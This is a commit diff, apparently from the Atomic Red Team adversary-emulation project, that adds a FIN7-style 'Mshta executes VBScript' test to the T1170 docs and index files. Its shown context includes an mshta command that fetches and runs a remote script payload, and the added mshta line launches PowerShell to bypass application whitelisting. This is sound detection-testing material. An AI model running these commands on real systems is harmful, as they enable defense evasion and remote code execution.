Generate docs from job=validate_atomics_generate_docs branch=master

atomics/T1170/T1170.md

@@ -14,6 +14,8 @@ Mshta.exe can be used to bypass application whitelisting solutions that do not a
 
 - [Atomic Test #1 - Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject](#atomic-test-1---mshta-executes-javascript-scheme-fetch-remote-payload-with-getobject)
 
+- [Atomic Test #2 - Mshta executes VBScript to execute malicious code](#atomic-test-2---mshta-executes-vbscript-to-execute-malicious-code)
+
 
 <br/>
 
@@ -35,4 +37,27 @@ mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Mshta executes VBScript to execute malicious code
+Run a local VB script to run local user enumeration powershell command
+
+This attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| atomics_path | path to atomics folder | path | ..\..\atomics|
+
+#### Run it with `command_prompt`! 
+```
+mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")
+```
+
+
+
 <br/>

atomics/index.md

@@ -296,6 +296,7 @@
   - Atomic Test #4: Modify registry to store logon credentials [windows]
 - [T1170 Mshta](./T1170/T1170.md)
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
+  - Atomic Test #2: Mshta executes VBScript to execute malicious code [windows]
 - [T1096 NTFS File Attributes](./T1096/T1096.md)
   - Atomic Test #1: Alternate Data Streams (ADS) [windows]
 - [T1126 Network Share Connection Removal](./T1126/T1126.md)
@@ -667,6 +668,7 @@
   - Atomic Test #3: Event Monitor Daemon Persistence [macos, centos, ubuntu, linux]
 - [T1170 Mshta](./T1170/T1170.md)
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
+  - Atomic Test #2: Mshta executes VBScript to execute malicious code [windows]
 - [T1086 PowerShell](./T1086/T1086.md)
   - Atomic Test #1: Mimikatz [windows]
   - Atomic Test #2: BloodHound [windows]

atomics/index.yaml

@@ -8827,6 +8827,24 @@ defense-evasion:
         elevation_required: false
         command: 'mshta.exe javascript:a=(GetObject(''script:#{file_url}'')).Exec();close();
 
+'
+    - name: Mshta executes VBScript to execute malicious code
+      description: |
+        Run a local VB script to run local user enumeration powershell command
+
+        This attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems.
+      supported_platforms:
+      - windows
+      input_arguments:
+        atomics_path:
+          description: path to atomics folder
+          type: path
+          default: "..\\..\\atomics"
+      executor:
+        name: command_prompt
+        command: 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell
+          -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")
+
 '
   T1096:
     technique:
@@ -19152,6 +19170,24 @@ execution:
         elevation_required: false
         command: 'mshta.exe javascript:a=(GetObject(''script:#{file_url}'')).Exec();close();
 
+'
+    - name: Mshta executes VBScript to execute malicious code
+      description: |
+        Run a local VB script to run local user enumeration powershell command
+
+        This attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems.
+      supported_platforms:
+      - windows
+      input_arguments:
+        atomics_path:
+          description: path to atomics folder
+          type: path
+          default: "..\\..\\atomics"
+      executor:
+        name: command_prompt
+        command: 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell
+          -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")
+
 '
   T1086:
     technique:

atomics/windows-index.md

@@ -96,6 +96,7 @@
   - Atomic Test #4: Modify registry to store logon credentials [windows]
 - [T1170 Mshta](./T1170/T1170.md)
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
+  - Atomic Test #2: Mshta executes VBScript to execute malicious code [windows]
 - [T1096 NTFS File Attributes](./T1096/T1096.md)
   - Atomic Test #1: Alternate Data Streams (ADS) [windows]
 - [T1126 Network Share Connection Removal](./T1126/T1126.md)
@@ -530,6 +531,7 @@
 - T1177 LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1170 Mshta](./T1170/T1170.md)
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
+  - Atomic Test #2: Mshta executes VBScript to execute malicious code [windows]
 - [T1086 PowerShell](./T1086/T1086.md)
   - Atomic Test #1: Mimikatz [windows]
   - Atomic Test #2: BloodHound [windows]